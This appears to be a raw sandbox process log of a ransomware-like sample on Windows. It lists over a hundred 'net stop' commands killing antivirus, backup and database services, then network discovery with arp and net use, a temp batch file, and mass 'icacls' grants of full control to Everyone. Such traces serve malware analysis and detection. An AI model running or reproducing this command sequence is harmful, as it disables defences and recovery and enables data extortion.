C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.0.1182⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp38AB.bat2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141517-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141647-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-141926-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10142021-142146-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\ja-JP\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\fr-FR\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\de-DE\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\confident.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\fyi.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\generic.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\confident.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\fyi.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\generic.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\confident.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\fyi.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\generic.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-10142021-141517.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-10142021-141517.log /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-10142021-141517-00000003-ffffffff.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.80 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.83 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-0F243867E520B7940C786D98F8198066146EE90A.bin.A0 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\0E38E18F-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q2⤵
-
-
